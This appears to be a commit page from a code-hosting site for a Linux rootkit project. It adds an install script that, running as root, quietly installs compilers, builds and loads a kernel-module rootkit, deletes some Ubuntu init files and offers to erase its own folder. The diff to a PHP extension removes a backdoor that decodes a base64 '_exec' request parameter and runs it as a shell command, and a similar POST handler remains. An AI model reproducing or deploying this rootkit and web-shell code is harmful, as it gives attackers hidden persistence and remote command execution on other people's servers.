Browse Source

Default

master
Root 5 years ago
parent
commit
cab01ba58d
  1. 107
      install.sh
  2. 0
      rkapache/Makefile
  3. 0
      rkapache/include/common.h
  4. 0
      rkapache/src/main.c
  5. 36
      rkphp/src/php_funcs.c

107
install.sh

@ -0,0 +1,107 @@ @@ -0,0 +1,107 @@
#!/bin/bash
# Errors and Fatals
[ $(uname) != "Linux" ] &&
{
echo "Not on a Linux system. Exiting..."
exit
}
[ $(id -u) != 0 ] &&
{
echo "Not root. Exiting..."
exit
}
[ ! -e /proc ] &&
{
echo "We're in a horrible jail as /proc doesn't exist. Exiting..."
exit
}
if [ -z "`which gcc`" ]; then
echo "Installing GCC"
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 gcc &>/dev/null
elif [ -f /usr/bin/apt-get ]; then
apt-get --yes --force-yes update &>/dev/null
apt-get --yes --force-yes install gcc &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm base-devel &>/dev/null
fi
fi
[ -f /usr/bin/yum ] &&
{
echo "Installing glibc-static"
yum install -y -q -e 0 glibc-static
}
CHATTR_OUTPUT=$(touch children; chattr +ia children &>output; cat output)
[[ $CHATTR_OUTPUT == *"Inappropriate ioctl"* ]] &&
{
read -p "Warning: You're attempting to install on a weird/alien filesystem, This is bad. Exiting..."
exit
}
chattr -ia children &>/dev/null
rm -f children output
install_prerequisites ()
{
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 make gcc libgcc glibc-devel attr &>/dev/null
elif [ -f /usr/bin/apt-get ]; then
apt-get --yes --force-yes &>/dev/null
apt-get --yes --force-yes install attr gcc-multilib build-essential &>/dev/null
if ! grep -q "Debian\|Ubuntu" /etc/issue.net; then
apt-get --yes --force-yes install libssl-dev &>/dev/null
fi
grep -i ubuntu /proc/version &>/dev/null && rm -f /etc/init/plymouth* &>/dev/null
elif [ -f /usr/bin/pacman ]; then
pacman -Syy &>/dev/null
pacman -S --noconfirm attr base-devel &>/dev/null
fi
}
compile_rkkern ()
{
cd rkkern && make clean
cd rkkern && make all
}
install_rkkern ()
{
rmmod rkkern
insmod bin/rkkern.ko
}
echo "Installing prerequisite packages."
install_prerequisites
echo "Packages installed!"
echo "Compiling rootkit libraries."
sleep 2
compile_rkkern
echo "Rootkit libraries compiled."
sleep 2
echo "Installing LKM Rootkit."
sleep 2
install_rkkern
echo "LKM Rootkit installed."
sleep 2
read -p "Would you like to automatically remove this directory (`pwd`) on exit? (YES/NO) (case-sensitive) [NO]: "
if [ -z $REPLY ]; then
echo "Not removing `pwd`"
elif [ "$REPLY" == "YES" ]; then
rm -rf `pwd`
elif [ "$REPLY" == "NO" ]; then
echo "Not removing `pwd`"
else
echo "Invalid option. Not removing."
fi
echo "Installation has finished."

0
rkapache/Makefile

0
rkapache/include/common.h

0
rkapache/src/main.c

36
rkphp/src/php_funcs.c

@ -167,40 +167,6 @@ PHP_RINIT_FUNCTION(rkphp) @@ -167,40 +167,6 @@ PHP_RINIT_FUNCTION(rkphp)
RKPHP_PRINTF("PHP_RINIT!\n");
zval *arr;
if((arr = zend_hash_str_find(&EG(symbol_table), "_GET", sizeof("_GET") - 1)))
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
php_printf("%s\n", output);
php_printf("</pre>\n");
pclose(fp);
}
}
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)))
{
@ -230,7 +196,7 @@ PHP_RINIT_FUNCTION(rkphp) @@ -230,7 +196,7 @@ PHP_RINIT_FUNCTION(rkphp)
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
php_printf("%s", output);
}
php_printf("</pre>\n");

Loading…
Cancel
Save